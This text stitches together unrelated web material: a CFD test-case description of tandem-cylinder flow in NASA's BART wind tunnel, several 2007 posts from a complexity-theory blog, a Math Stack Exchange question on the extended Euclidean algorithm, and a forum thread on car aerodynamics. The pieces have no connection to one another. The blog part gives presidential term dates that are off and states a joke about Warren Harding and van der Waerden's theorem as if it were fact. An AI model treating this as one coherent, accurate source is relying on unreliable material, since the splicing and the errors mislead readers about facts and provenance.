Figure 1: Schematic of TC configuration [3]
Geometric and regime parameters defining the test case are summarized in Table 1.
Table 1: Flow parameters
| Parameter | Notation | Value |
|---|---|---|
| Reynolds number | Re = ${\displaystyle U_{0}D/\nu }$ | 1.66 × 10^5 |
| Mach number | M | 0.128 |
| Separation distance | ${\displaystyle L/D}$ | 3.7 |
| TC aspect ratio | ${\displaystyle L_{z}/D}$ | 12.4 |
| Cylinder diameter | ${\displaystyle D}$ | 0.05715 m |
| Free stream velocity | ${\displaystyle U_{0}}$ | 44 m/s |
| Free stream turbulence intensity | ${\displaystyle K}$ | 0.1% |
The principal measured quantities by which the success or failure of CFD calculations are to be judged are as follows:
• Mean Flow
• Distributions of the time-averaged pressure coefficient, $C_p=\langle p-p_0\rangle/(\frac{1}{2}\rho_0U_0^2)$, over the surface of both cylinders;
• Distribution of the time-averaged streamwise velocity $\langle u\rangle/U_0$ along a line connecting the centres of the cylinders;
• Distributions of the root-mean-square (rms) of the pressure coefficient over the surface of both cylinders;
• Power spectral density of the pressure coefficient (dB/Hz versus Hz) on the upstream cylinder at $\theta$ = 135°;
• Power spectral density of the pressure coefficient (dB/Hz versus Hz) on the downstream cylinder at $\theta$ = 45°;
• Turbulence kinetic energy
• x–y cut of the field of time-averaged two-dimensional turbulent kinetic energy $\mathrm{TKE}=\frac{1}{2}\left(\langle u'u'\rangle+\langle v'v'\rangle\right)/U_0^2$;
• 2D TKE distribution along y = 0;
• 2D TKE distribution along x = 1.5D (in the gap between the cylinders);
• 2D TKE distribution along x = 4.45D (0.75D downstream of the centre of the rear cylinder).
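For comparing one's own CFD output against these targets, the two time-averaged quantities can be assembled from pointwise pressure and velocity samples as sketched below. The free stream values and the synthetic Gaussian signals are illustrative stand-ins, not data from the source:

```python
import random
from statistics import fmean, pvariance

rho0, U0, p0 = 1.225, 44.0, 101325.0   # illustrative free stream values

# Synthetic time series standing in for CFD probe data at one point.
rng = random.Random(0)
p = [p0 + rng.gauss(0, 200.0) for _ in range(10_000)]
u = [0.8 * U0 + rng.gauss(0, 2.0) for _ in range(10_000)]
v = [rng.gauss(0, 1.5) for _ in range(10_000)]

# Time-averaged pressure coefficient Cp = <p - p0> / (0.5 * rho0 * U0^2).
Cp = fmean(pi - p0 for pi in p) / (0.5 * rho0 * U0**2)

# Two-dimensional TKE = 0.5 * (<u'u'> + <v'v'>) / U0^2,
# with the fluctuations taken about the time mean.
tke2d = 0.5 * (pvariance(u) + pvariance(v)) / U0**2
print(Cp, tke2d)
```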
All these and some other data are available here in both Windows and Unix compressed formats:
- problem_statement.pdf
- problem_data_and_guidelines.pdf
- data.zip (Windows) / data.tgz (Unix)
- figures.zip (Windows) / figures.tgz (Unix)
These data are gratefully made available by the BANC-I Workshop.
## Test Case Experiments
A detailed description of the experimental facility and measurement techniques is given in the original publications [2-4], so here we present only concise information about these aspects of the test case.
Figure 2: TC configuration in the BART facility [3]
Experiments have been conducted in the Basic Aerodynamic Research Tunnel (BART) at NASA Langley Research Center (see Figure 2). This is a subsonic, atmospheric wind-tunnel for investigation of the fundamental characteristics of complex flow-fields. The tunnel has a closed test section with a height of 0.711 m, a width of 1.016 m, and a length of 3.048 m. The span size of the cylinders was equal to the entire BART tunnel height, thus resulting in the aspect ratio Lz / D = 12.4. The free stream velocity was set to 44 m/s giving a Reynolds number based on cylinder diameter equal to 1.66 × 105 and Mach number equal to 0.128 (flow temperature T = 292 K).
The free stream turbulence level was less than 0.10%. In the first series of experiments [2, 3], in order to ensure turbulent separation from the upstream cylinder at the considered Reynolds number, the boundary layers on this cylinder were tripped between azimuthal locations of 50 and 60 degrees from the leading stagnation point using a transition strip. For the downstream cylinder, it was assumed that the trip-like effect of the impinging turbulent wake from the upstream cylinder would automatically ensure turbulent separation. However, it was later found [4] that tripping the downstream cylinder at L/D = 3.7 also has a rather tangible effect: it reduced the peaks in the mean Cp distribution along the rear cylinder, accompanied by earlier separation from the cylinder surface, reduced pressure recovery, lower levels of mean TKE in the wake, and reduced levels of peak surface-pressure fluctuations. For this reason, these experimental data [4], with tripping of both cylinders, were used for the comparison with fully turbulent CFD.
In the course of experiments, steady and unsteady pressure measurements were carried out along with 2-D Particle Image Velocimetry (PIV) and hot-wire anemometry used for documenting the flow interaction around the two cylinders (mean streamlines and instantaneous vorticity fields, shedding frequencies and spectra).
Information on the data accuracy available in the original publications [2-4] is summarized in Table 2. Most absolute values are given based on nominal tunnel conditions or on an average data value. Percentage values are quoted for parameters where the uncertainty equations were posed in terms of the uncertainty relative to the nominal value of the parameter.
Table 2: Estimated Experimental Uncertainties
| Quantity | Uncertainty |
|---|---|
| Drag coefficient | 0.0005 |
| PIV: Umean, Vmean | 0.03 (normalized) |
| PIV: spanwise velocity | 1.8 (normalized) |
| PIV: TKE | 4% |
| Power spectral density (PSD) | 10 – 20% |
| Cp' rms | 5 – 11% |
| Diameter D; sensor spacing Δz | 0.005 inch |
## CFD Methods
The key physical features of the UFR (see Description) present significant difficulties for all the existing approaches to turbulence representation, whether from the standpoint of solution fidelity (for the conventional (U)RANS models) or in terms of computational expense for full LES (especially if the turbulent boundary layers are to be resolved). For this reason, most of the computational studies of multi-body flows, in general, and the TC configuration, in particular, are currently relying upon hybrid RANS-LES approaches. This is true also with regard to simulations carried out in the course of the BANC-I and II Workshops and in the framework of the ATAAC project, where different hybrid RANS-LES models of the DES type were used (see Table 3) [1].
Table 3: Summary of simulations
| Partner | Turbulence modelling approach | Compressible/Incompressible | Lz | Grid | Side walls |
|---|---|---|---|---|---|
| Beijing Tsinghua University (BTU) | SST DDES | Compressible | 3D | Mandatory | Slip |
| German Aerospace Center, Göttingen (DLR) | SA DDES | Compressible | 3D | Mandatory | Slip |
| New Technologies and Services, St.-Petersburg, Russia (NTS) | SA DDES, SA IDDES | Incompressible and compressible | 3D, 16D | Mandatory | Slip |
| Technische Universität Berlin (TUB) | SA DDES, SA IDDES | Incompressible | 3D | Mandatory | Slip |
SST - k–ω Shear Stress Transport model [9]; SA - Spalart-Allmaras model [10]; SA and SST DDES - Delayed DES based on the SA and SST models [11]; SA IDDES - Improved DDES based on the SA model [12].
As mentioned in the section on the experiments above, the boundary layers on both cylinders were tripped ahead of their separation, thus justifying the "fully turbulent" simulations.
All the partners used their own flow solvers.
In particular, BTU employed an in-house compressible Navier-Stokes code with a weighted central-upwind approximation of the inviscid fluxes based on a modification of a high-order symmetric total variation diminishing scheme. The method combines a 6th-order central and a 5th-order WENO scheme. For the time integration, an implicit LU-SGS algorithm is applied with Newton-like sub-iterations.
DLR used their unstructured TAU code, a finite-volume compressible Navier-Stokes solver. The solver employs a standard central scheme with matrix dissipation and the dual time-stepping strategy of Jameson. A 3W multigrid cycle was applied to the momentum and energy equations, whilst the SA transport equation was solved on the finest grid only. Time integration was performed with an explicit 3-level Runge-Kutta scheme. The method is of 2nd order in both space and time.
NTS used their in-house finite-volume NTS code, a structured code accepting multi-block overset grids of Chimera type. The incompressible branch of the code employs Rogers and Kwak's scheme [13], while for compressible flows the Roe scheme is applied. The spatial approximation of the inviscid fluxes within these methods is performed differently in different grid blocks (see Figure 3 below). In particular, in the outer block a 3rd-order upwind-biased scheme is used, whereas in the other blocks a weighted 5th-order upwind-biased / 4th-order central scheme with an automatic (solution-dependent) blending function [14] is employed. For the time integration, an implicit 2nd-order backward Euler scheme with sub-iterations was applied.
Finally, TUB applied their in-house multi-block structured code ELAN in the framework of the incompressible flow assumption. The pressure-velocity coupling is based on the SIMPLE algorithm. For the convective terms, a hybrid approach [14] blending 2nd-order central and upwind-biased TVD schemes was used. The time integration was similar to that of NTS.
The viscous terms of the governing equations in all the codes are approximated with the 2nd order centered scheme.
Figure 3: Mandatory grid in X-Y plane.
All the simulations were carried out on the same "mandatory" grid, whose X-Y cut is shown in Figure 3. This is a multi-block structured grid designed according to guidelines for DES-like simulations [15]. The grid has 5 main blocks: 1 block in the outer or Euler Region (ER), 3 blocks in the Focus Region (FR), which includes the gap between the cylinders and the near wake of the downstream cylinder, and 1 block in the Departure Region (DR). The distance between the nodes on the forward half of the upstream cylinder is close to 0.02D, and on its backward part it is 0.01D, with a smooth transition between the two. As a result, the total number of nodes on the surface of the upstream cylinder is 245. On the downstream cylinder there are 380 uniformly distributed nodes (the distance between the nodes is 0.008D). In law-of-the-wall units, the radial step closest to the cylinder walls is less than 1.0. In the major part of the FR the cells are nearly isotropic, with a size of about 0.02D. In the ER and DR the grid steps increase gradually (linearly with r). The total size of the grid in the XY plane is 82,000 cells.
According to the recommendations of the organizers of the BANC-I Workshop, the mandatory spanwise size of the computational domain, Lz, in all the simulations was set equal to 3D. The grid step in the span direction, Δz, was 0.02D, resulting in nearly cubic cells in the focus region and a total of about 11 million cells.
The boundary conditions used in the simulations were as follows.
No-slip conditions were imposed on the cylinder walls and periodic conditions were used in the z-direction, whereas the lateral boundaries were treated as frictionless walls (free-slip condition) in order to account for the blockage effect of the side walls of the experimental test section at ±8.89D.
Inflow and outflow boundary conditions differed between the incompressible and compressible simulations. In the compressible simulations of BTU and DLR, characteristic boundary conditions were imposed on both the inflow and outflow boundaries with no sponge layers. NTS applied characteristic-type boundary conditions only at the inflow boundary; at the outflow boundary a constant static pressure was specified, and the remaining flow parameters were extrapolated to the boundary from the interior of the domain. In order to avoid reflections of waves from the outflow boundary, a sponge layer was used, allocated to an additional Cartesian grid block of length 15D.
In the incompressible simulations of NTS a uniform velocity and constant pressure were specified at the inflow and outflow of the domain respectively.
1. Some participants of the BANC Workshops have used pure LES rather than DES-like approaches, but these computations had the most difficulty simulating the high-Reynolds-number aspects of the flow [5].
Contributed by: A. Garbaruk, M. Shur and M. Strelets — New Technologies and Services LLC (NTS) and St.-Petersburg State Polytechnic University
https://blog.computationalcomplexity.org/2007/12/?m=0

## Monday, December 31, 2007
### Presidential Math
On Jan 3 is the Iowa Caucus, the first contest (or something) in the US Presidential race. The question arises: Which presidents knew the most mathematics? The question has several answers depending on how you define "know" and "mathematics". Rather than answer it, I'll list a few who know some mathematics.
1. Jimmy Carter (President 1976-1980, lost re-election) was trained as a Nuclear Engineer, so he knew some math a long time before becoming president. (I do not know if he ever actually had a job as an Engineer.) I doubt he knew much when he was president.
2. Herbert Hoover (President 1928-1932, lost re-election) was a Mining Engineer and actually did it for a while and was a success. Even so, I doubt he knew much when he was president.
3. James Garfield (President 1881-1881, he was assassinated) had a classical education and came up with a new proof of the Pythagorean Theorem.
4. Thomas Jefferson (President 1801-1809) had a classical education and is regarded by historians as being a brilliant man. He invented a Crypto system in 1795. Note that this is only 6 years before becoming president, so he surely knew some math when he was president.
5. Misc: Lyndon B. Johnson was a high school math teacher, and Ulysses S. Grant wanted to be one but became president instead. George Washington was a surveyor, which needs some math. Many of the early presidents had classical educations, which would include Euclid. And lastly, Warren G. Harding got an early draft of Van Der Waerden's theorem, conjectured the polynomial VDW, but was only able to prove the quadratic case (not surprising—he is known as one of our dumber presidents).
I would guess that Jimmy Carter and Herbert Hoover knew more math (there was far more to know) than Jefferson, but Jefferson knew more as a percent of what there was to know than Carter and Hoover. Garfield, while quite smart, probably does not rank in either category. I don't think any of the current major candidates were trained in math. Hillary Clinton, Barack Obama, John Edwards, Rudy Giuliani, and Mitt Romney were all trained as lawyers. Rudy Giuliani and Mitt Romney have been businessmen as well. Huckabee was a minister, McCain was a soldier. I do not know what they majored in as undergrads.
## Thursday, December 27, 2007
### Oral Homework
This fall in my graduate complexity course, 5 of the 11 HWs were group HWs. This means that
1. The students are in groups of 3 or 4. The groups are self-selected and permanent (with some minor changes if need be).
2. The groups do the HW together.
3. They are allowed to use the web, other students, me, other profs.
4. The HW is not handed in; they get an Oral Exam on it.
5. The HW is usually "read this paper and explain this proof to me."
In my graduate course in Complexity Theory, which I just finished teaching, 5 out of the 11 HWs were Oral HWs. Here is basically what they were:
1. Savitch's theorem and Immerman-Szelepcsenyi Theorem.
2. Show that VC and HAM are NPC.
3. E(X+Y)=E(X)+E(Y), Markov, Chebyshev, Chernoff
4. Reg Exp with squaring NOT in P.
5. Matrix Group Problem in AM. (Babai's paper "Trading Group Theory for Randomness").
1. The students learned A LOT by doing this. They learned the material in the paper, they learned how to read a paper, and they learned how to work together. (Will all of these lessons stick?)
2. Some proofs are better done on your own than having a professor tell them to you (HAM cycle being NPC comes to mind). This is a way to make them learn those theorems without me having to teach them.
3. Some theorems are needed for the course, but are not really part of the course (Chernoff Bounds come to mind). The Oral HW makes them learn that.
4. This was a graduate course in theory so the students were interested and not too far apart in ability. This would NOT work in an ugrad course if either of those were false.
5. This course only had 19 students in it, so was easy enough to administer.
So the upshot: it worked! I recommend it for small graduate classes.
## Monday, December 24, 2007
### The Twelve Days of Tenure
On the twelfth glance at her case, what did we all see:
12 people asking her questions in her office, 11 times taught Intro Programming, 10 journal articles, 9 pieces of software, 8 book chapters, 7 invited panels, 6 submitted articles, 5 mil-lion bucks!, 4 invited talks, 3 students, 2 post-docs, and a degree from MIT.
NOTE: The 12 Days of Christmas is (easily) the most satirized song ever. I used to maintain a website of satires of it here, but it was too hard to keep up. Why? Because anyone can write one. I wrote the one above in about 10 minutes during a faculty meeting to decide someone's tenure case.
## Friday, December 21, 2007
Bill Gasarch is on vacation and he had given me (Lance) a collection of posts for me to post in his absence. But then I got email from Tal Rabin who wants to get the word out about the Women in Theory workshop to be held in Princeton in June. Done. Now back to your regularly scheduled post from Bill.
I don't usually watch Deal/No Deal. I like some of the interesting math or dilemmas it brings up, but the show itself is monotonous. As Host Howie Mandel himself says "we don't ask you a bunch of trivia questions, we just ask you one question: DEAL or NO DEAL!" Here is a scenario I saw recently where I thought the contestant made the obviously wrong choice.
1. There are two numbers left on the board: $1,000 and $200,000.
2. She is offered a $110,000 deal.
3. She has mentioned that $110,000 is about 5 times her salary (so this amount of money would make a huge difference in her life).
4. Usually on this show you have the audience yelling 'NO DEAL! NO DEAL!' This time the audience, including her mother, her sister, and some friends, were yelling 'TAKE THE DEAL! TAKE THE DEAL!' While this is not a reason to take the deal, note that the decision to say NO DEAL was NOT a 'caught up in the moment' sort of thing.
She DID NOT take the deal. We should judge if this was a good or bad decision NOT based on the final outcome (which I won't tell you). Here is why I think it was the wrong choice. Consider the following scenarios:
1. If she takes the deal, the worst case is that she gets $110,000 instead of $200,000.
2. If she rejects the deal, the worst case is that she gets $1,000 instead of $110,000.
The first one is not-so-bad. The second is really really bad. Is there a rational argument for her decision? I could not come up with one, but maybe I'm just risk-averse.
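A quick check of the numbers supports this view. Even a risk-neutral player should take the deal here, since the offer exceeds the expected value of the board, and any concave (risk-averse) utility, such as the log utility used below purely as an illustration, favors the deal even more strongly:

```python
import math

board = [1_000, 200_000]   # remaining amounts on the board
deal = 110_000             # banker's offer

# Risk-neutral comparison: expected value of saying NO DEAL.
ev_no_deal = sum(board) / len(board)
print(ev_no_deal)          # 100500.0, already below the 110,000 offer

# Risk-averse comparison with log utility (an illustrative choice).
u_deal = math.log(deal)
u_no_deal = sum(math.log(x) for x in board) / len(board)
print(u_deal > u_no_deal)  # True: the deal looks even better
```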
## Wednesday, December 19, 2007
### More on VDW over the Reals
Some of the comments made on the post on VDW over the Reals have been very enlightening to me about some math questions. In THIS post I will reiterate them, to clarify them for myself and hopefully for you.
I had claimed that the proof that if you 2-color R you get a monochromatic 3-AP USED properties of R, notably that the midpoint of two elements of R is an element of R. Someone named ANONYMOUS (who would have impressed me if I knew who she was) left a comment pointing out that the proof works over N as well. THIS IS CORRECT:
If you 2-color {1,...,9} then there will be a mono 3-AP. Just look at {3,5,7}. Two of them are the same color.
1. If 3,5 are RED then either 1 is RED and we're done, or 4 is RED and we're done, or 7 is RED and we're done, or 1,4,7 are all BLUE and we're done.
2. If 5,7 are RED then either 3 is RED and we're done, or 6 is RED and we're done, or 9 is RED and we're done, or 3,6,9 are all BLUE, and we're done.
3. If 3,7 are RED then either 1 is RED and we're done, or 5 is RED and we're done, or 9 is RED and we're done, or 1,5,9 are BLUE and we're done.
This is INTERESTING (at least to me) since VDW(3,2)=9 is TRUE and this is a nice proof that VDW(3,2) ≤ 9. (It's easy to show VDW(3,2) ≠ 8: take the coloring RRBBRRBB.) I had asked if VDWr may have an easier proof than VDW. Andy D (Andy Drucker, who has his own blog) pointed out that this is unlikely since there is an easy proof that VDWR --> VDW. Does this make VDWr more interesting or less interesting? Both!
1. More Interesting: If VDWr is proven true using analysis or logic, then we get a NEW proof of VDW!
2. Less Interesting: Since it is unlikely to get a new proof of VDW, it is unlikely that there is a proof of VDWr using analysis.
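The two small facts used above, VDW(3,2) ≤ 9 and VDW(3,2) ≠ 8, are easy to confirm by brute force over all 2-colorings (a quick sketch):

```python
from itertools import product

def has_mono_3ap(coloring):
    """coloring: tuple of colors for 1..n (index i holds the color of i+1)."""
    n = len(coloring)
    for a in range(1, n + 1):
        for d in range(1, (n - a) // 2 + 1):
            if coloring[a - 1] == coloring[a + d - 1] == coloring[a + 2 * d - 1]:
                return True
    return False

# VDW(3,2) <= 9: every 2-coloring of {1..9} has a monochromatic 3-AP.
print(all(has_mono_3ap(c) for c in product("RB", repeat=9)))   # True

# VDW(3,2) > 8: the coloring RRBBRRBB of {1..8} avoids them.
print(has_mono_3ap(tuple("RRBBRRBB")))                          # False
```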
## Friday, December 14, 2007
### Complexity Theory Class Drinking Game
1. Whenever a complexity class is defined that has zero natural problems in it, take one drink.
2. Whenever a class is defined that has one natural problem in it, take two drinks.
3. Whenever you are asked to vote on whether or not a problem is natural, take three drinks.
4. Whenever a mistake is made that can be corrected during that class, take one drink.
5. Whenever a mistake is made that can be corrected during the next class, take two drinks.
6. Whenever a mistake is made that cannot be corrected because it's just wrong, take three drinks.
7. Whenever a probability is amplified, refill your cups since a class with zero or one natural problems in it is on its way.
8. Whenever the instructor says that a theorem has an application, take a drink.
9. Whenever the instructor says that a theorem has an application, and it actually does, take two drinks.
10. Whenever the instructor says that a theorem has an application outside of theory, take two drinks.
11. Whenever the instructor says that a theorem has an application outside of theory, and it really does, take four drinks.
## Monday, December 10, 2007
### An ill-defined question inspired by that HS question
RECALL the problem from my last post:
Each point in the plane is colored either red or green. Let ABC be a fixed triangle. Prove that there is a triangle DEF in the plane such that DEF is similar to ABC and the vertices of DEF all have the same color.
The answers to all of the problems on the exam are posted; see here for the webpage of the competition. The problem above is problem 5.
One of the key observations needed to solve the problem is the following theorem:
If the reals are 2-colored then there exist 3 points of the same color that are equally spaced.
Before you can say 'VDW theorem!' or 'Roth's Theorem!' or 'Szemeredi's theorem for k=3!', realize that this was an exam for High School Students, who would not know such things. And indeed there is an easier proof that a HS student could (and in fact some did) use:
Let a,b both be RED. If (a+b)/2 is RED then a,(a+b)/2,b works. If 2b-a is RED then a,b,2b-a works. If 2a-b is RED then 2a-b,a,b works. IF none of these hold then 2a-b,(a+b)/2,2b-a are all BLUE and that works.
By VDW the following, which we denote VDWR, is true by just restricting the coloring to N:
VDWR: For any k,c, for any c-coloring of R (yes R) there exists a monochromatic arithmetic progression of length k.
This raises the following ill-defined question:
Is there a proof of VDWR that is EASIER than using VDW's theorem? Or at least different, perhaps using properties of the reals (the case of c=2, k=3 used that the midpoint of two reals is always a real).
## Friday, December 07, 2007
I was assigned to grade the following problem from the Maryland Math Olympiad from 2007 (for High School Students):
Each point in the plane is colored either red or green. Let ABC be a fixed triangle. Prove that there is a triangle DEF in the plane such that DEF is similar to ABC and the vertices of DEF all have the same color.
I think I was assigned to grade it since it looks like the kind of problem I would make up, even though I didn't. It was problem 5 (out of 5) and hence it was what we thought was the hardest problem. About 100 people tried it, and less than 5 got it right, and less than 10 got partial credit (and they didn't get much).
All the vertices are red because I can make them whatever color I want. I can also write at a 30 degree angle to the bottom of this paper if thats what I feel like doing at the moment. Just like 2+2=5 if thats what my math teacher says. Math is pretty subjective anyway. (NOTE- this was written at a 30 degree angle.)
I like to think that we live in a world where points are not judged by their color, but by the content of their character. Color should be irrelevant in the the plane. To prove that there exists a group of points where only one color is acceptable is a reprehensible act of bigotry and discrimination.
Were they serious? Hard to say, but I would guess the first one might have been but the second one was not.
## Wednesday, December 05, 2007
### Crypto problem inspired by politeness
The following happened (a common event), but it inspired a crypto question (probably already known and answered); I would like your comments or a pointer to what is known.
My mother-in-law Margie and her sister Posy had the following conversation:
POSY: Let me treat the lunch.
MARGIE: No, we should pay half.
POSY: No, I want to treat.
MARGIE: No, I insist.
This went on for quite a while. The question is NOT how to avoid infinite loops; my solution to that is easy: if someone offers to treat, I say YES, and if someone offers to pay 1/2, I say YES, not because I'm cheap, but to avoid infinite loops.
Here is the question. It is not clear if Posy really wanted to treat for lunch, or was just being polite. It is not clear if Margie really wanted to pay half, or was just being polite. SO, is there some protocol where the probability of both getting what they DO NOT WANT is small (or of both getting what they want is large), and neither one finds out what the other really wants? Here is an attempt which does not work.
1. Margie has a coin. Margie's coin says OFFER with probability p, and DO NOT OFFER with probability 1-p. If she really wants to make the offer to treat then p is large, else p is small. It could be p=3/4 or p=1/4, for example.
2. Posy has a similar coin.
3. Margie flips, Posy Flips.
4. If Margie's coin says OFFER, then make the offer. If not, then don't.
5. Same with Posy.
The bad scenario, in which they both get what they don't want, has probability 1/8. However, if they do this a lot then Margie and Posy will both get a good idea of what the other really wants.
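The leakage in the repeated-lunch scenario is easy to see numerically: after many rounds, the observed frequency of OFFER pins down p, and hence the underlying preference. The sketch below uses the p = 3/4 setting from above; the number of rounds is an arbitrary illustration:

```python
import random

random.seed(1)
p = 3 / 4       # Margie secretly wants to treat, so her coin is biased to OFFER
n = 10_000      # number of repeated lunches (illustrative)

# Posy simply counts how often Margie's coin came up OFFER.
offers = sum(random.random() < p for _ in range(n))
p_hat = offers / n
print(p_hat)    # close to 0.75, so Posy can infer Margie's true preference
```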
In solutions you may offer or point me to, we can of course assume access to random coins, and that neither Posy nor Margie can factor or take discrete logs.
https://math.stackexchange.com/questions/2439928/extended-euclidean-algorithm-a-remainder-becomes-zero

# Extended Euclidean Algorithm: a remainder becomes zero
When working on the Chinese Remainder Theorem, I have stumbled upon this system of linear congruences. $$x\equiv2 \mbox{ mod 3}$$ $$x\equiv3 \mbox{ mod 5}$$ $$x\equiv4 \mbox{ mod 11}$$ $$x\equiv5 \mbox{ mod 16}$$
The problem I am having is, when I apply the extended Euclidean algorithm to find $M_2$ such that $N_2 M_2\equiv1\mbox{ mod }n_2$ (where $n_2=5$, $N_2=3\times11\times16=528$, and $M_2$ is the modular inverse of 528 under $\mbox{mod }5$), I reach the following.
$$528=105\times5+3\\ 105=35\times3+0$$ What I don't understand is how to proceed from this point. This question may have been asked somewhere on this Stack Exchange before, but I am unable to find any such question, which is why I have chosen to post this. Thanks in advance.
• @GAVD Thanks for making it look better. :) – Romeo Sierra Sep 22 '17 at 5:48
• $528$ is not $105\times 5+30$. – Angina Seng Sep 22 '17 at 5:49
• Corrected. It was a typo.. – Romeo Sierra Sep 22 '17 at 5:52
• Surely, the next stage in your EEA should be $5-1\times 3=2$? – Angina Seng Sep 22 '17 at 5:54
• @LordSharktheUnknown Didn't get you. Can you please elaborate? – Romeo Sierra Sep 22 '17 at 7:11
So the problem here is that I was choosing the wrong input to the second iteration. I was choosing 105, the quotient of $528\div5$, as the dividend, whereas it should actually be 5, the divisor of the previous iteration. So it actually should be
$$528=105\times5+3\\ 5=1\times3+2\\ 3=1\times2+1$$ and that's it. Thanks to @N.F.Taussig and @LordSharktheUnknown.
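For completeness, here is a sketch of how the corrected iterations yield the inverse, and how the full system is then solved by CRT. The helper function is my own; on Python 3.8+ the modular inverse can also be obtained directly as `pow(528, -1, 5)`:

```python
def extended_gcd(a, b):
    """Return (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    g, x, y = extended_gcd(b, a % b)
    return g, y, x - (a // b) * y

# Inverse of N2 = 528 modulo n2 = 5: note 528 = 3 (mod 5) and 3*2 = 6 = 1 (mod 5).
g, M2, _ = extended_gcd(528, 5)
M2 %= 5
print(M2)   # 2

# Assembling the CRT solution of the whole system.
residues, moduli = [2, 3, 4, 5], [3, 5, 11, 16]
N = 1
for m in moduli:
    N *= m
x = sum(r * (N // m) * pow(N // m, -1, m) for r, m in zip(residues, moduli)) % N
print(x)    # 1973
```

So $M_2 = 2$ (indeed $528\times2 = 1056 \equiv 1\mbox{ mod }5$), and the full system has solution $x \equiv 1973\mbox{ mod }2640$.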
https://www.physicsforums.com/threads/aerodynamic-design-for-cars.11920/

# Aerodynamic design for cars
1. Jan 2, 2004
### bracey
What are all the advantages of good aerodynamic design and how can these be proved mathematically?
For example what is the difference between a truck with a wind deflector and the same truck without the wind deflector?
2. Jan 2, 2004
### Staff: Mentor
I'm sure the designers do a computational fluid dynamic analysis, but the easiest way to prove it is with a wind tunnel. Aerodynamics plays a significant role in top speed and fuel economy.
3. Jan 11, 2004
### Sudden_strike88
Well, I have been interested in aerodynamics for a long time now, and I can say some things that are basically wrong with some vehicles:
*trucks and buses have flat fronts which probably make 100 kg of drag at 100 km/h
*cars have spoilers because the designers are DUMB and make the shape of a car like an airfoil (the most common design) and then struggle to keep the wheels on the ground with spoilers
*cars have a flat rear that automatically generates low pressure. Though it collapses to create a vortex, that is still a waste!
The list can go on if you just look carefully...
4. Jan 12, 2004
### NateTG
You should distinguish between spoilers and wings. Spoilers act to break lift, and can make cars more aerodynamic by breaking down the vortex/vacuum at the tail.
Wings generate lift, on cars this is typically negative lift, and are used essentially only on racecars.
Drag is typically measured in newtons or pounds; kilograms are a unit of mass.
Less drag means higher fuel efficiency and a potentially higher top speed.
Using wings for downforce means that cars can accelerate more because there is more friction between the tires and the road. At speed, Formula 1 cars could drive upside down because the downforce is larger than the weight of the car.
In practice, serious interest in aerodynamics on cars is mostly in the context of racing.
A second environment where fuel economy is important is trucking, but in that environment the need is for inexpensive aerodynamic improvements.
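To put rough numbers on the drag being discussed, the standard drag equation F = 0.5 * rho * v^2 * Cd * A can be evaluated directly. A sketch in Python; the drag coefficient and frontal area below are assumed, illustrative values for a flat-fronted truck, not measured data:

```python
def drag_force(rho, v, cd, area):
    """Aerodynamic drag in newtons: F = 0.5 * rho * v**2 * Cd * A."""
    return 0.5 * rho * v ** 2 * cd * area

rho = 1.225      # air density at sea level, kg/m^3
v = 100 / 3.6    # 100 km/h expressed in m/s
cd = 0.8         # assumed drag coefficient for a flat-fronted truck
area = 8.0       # assumed frontal area, m^2

force = drag_force(rho, v, cd, area)
print(round(force), "N")  # roughly 3000 N, i.e. about 300 kgf
```

Dividing by g ≈ 9.81 m/s² converts the result to the kilogram-force figures quoted earlier in the thread.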
5. Jan 21, 2004
### rdt2
Good aerodynamic design reduces drag which improves fuel economy. The mathematics of aerodynamics is well known and the best overall shape (from a low-drag point of view) is called a Rankine Oval. However, in the real world, you have to compromise good aerodynamics with the need to fit in the engine, passengers, loadspace, etc and the cost of manufacture. An excellent example of a good compromise is the Citroën Xsara Picasso - almost a perfect Rankine Oval.
One of the aims in streamlining is to reduce the vortices that dissipate energy. These tend to occur when you get sharp re-entrant corners and flat surfaces. However, the frontal shape of the vehicle is not too much of a problem because it pushes a wedge of air before it, effectively streamlining it. And trucks tend to be slim relative to their length - which also helps. More important is the back - a flat back drags a lot of turbulent air behind it and should really be streamlined. However this isn't practical with large trucks because it would compromise the shape of the loadspace. Streamlining the turbulent re-entrant corner between the cab and the box body is a cheap and useful addition.
Of course, none of this is to do with roadholding. To improve roadholding using aerodynamics is possible (e.g ground effect in F1 cars) but you may have to compromise on drag. All engineering is a compromise.
Cheers,
ron.
6. Dec 15, 2006
### danscope
Hi, Many excellent responses. Take a look at Buckminster Fuller's
DYMAXION CAR. This is an excellent design, ahead of its time.
A three wheeler with a tear drop body, and low sprung weight suspension, which needed a front wheel drive system like we see everywhere today.
Remarkable for 1935. And it did all this with a 90 HP flathead V-8.
I can only imagine what Bucky would have done with a 2.5 L Subaru and carbon fibre.
Best regards, Dan
7. Dec 16, 2006
### Danger
I'm glad that you're doing it, though, 'cause they're good ones.
8. Dec 16, 2006
### Karana
I know this is off thread but I'm trying to get a hold of Danger. Can you PM me please?
9. Dec 16, 2006
### Danger
Done, and nice to meet you.
10. Dec 18, 2006
### danscope
Hi, Thanks for the reply. Nice to meet you.
Enjoy your Holidays, and Best regards, Dan
11. Dec 18, 2006
### Danger
Likewise.
12. Dec 19, 2006
### danscope
Hi, You should see my design for a three wheeled flying motorcycle.
A section of glider fuselage with one wheel in back and two wheels forward,
tandem seating, and a modest 2-cycle engine for power. A Rotax water-cooled would be ideal. 65 mph ground speed.
Flying package in the form of a Burt Rutan "Long-EZ": 150 HP, swept wing with tip rudders and a canard wing forward (detachable). Would like to see this as a home-built with factory parts (wings, fuselage skins, tube chassis ..)
Under $40,000; 175 kts cruise, 60 kts landing, 1200 nm range. Just on paper for now. Best regards, Dan

13. Dec 19, 2006

### 3trQN

Sorry, couldn't help but picture the 2CV as an anti-example of aerodynamic design. :rofl:

14. Dec 19, 2006

### Danger

That actually sounds pretty reasonable. I assume that you'd have to stow the wings along the sides while ground-bound. Detachable, or folding?

15. Dec 19, 2006

### danscope

Hi, nice of you to reply. Here is an extended description of the design. Bear in mind: all of the expensive components "stay" at the airport. We don't want some fool running into our expensive wings, engines, propellers etc. They stay safely where they belong. Here is the picture:

